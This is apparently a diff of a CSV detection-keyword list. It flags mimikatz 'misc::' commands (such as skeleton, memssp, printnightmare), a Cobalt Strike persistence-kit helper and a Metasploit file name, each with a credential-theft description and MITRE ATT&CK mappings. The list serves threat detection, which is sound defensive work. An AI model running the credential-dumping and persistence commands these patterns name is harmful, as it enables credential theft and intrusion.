T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::lock*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::memssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::mflt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::ncroutemon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::ngcsign*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::printnightmare*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::regedit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::shadowcopies*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::skeleton*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::spooler*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::taskmgr*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::wp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::xor*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*miscbackdoorlnkhelp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*missile-command.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*misc::aadcookie*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::clip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::cmd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::compress*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::detours*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::efs*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::lock*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::memssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::mflt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::ncroutemon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::ngcsign*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::printnightmare*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::regedit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::shadowcopies*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::skeleton*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::spooler*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::taskmgr*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::wp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" 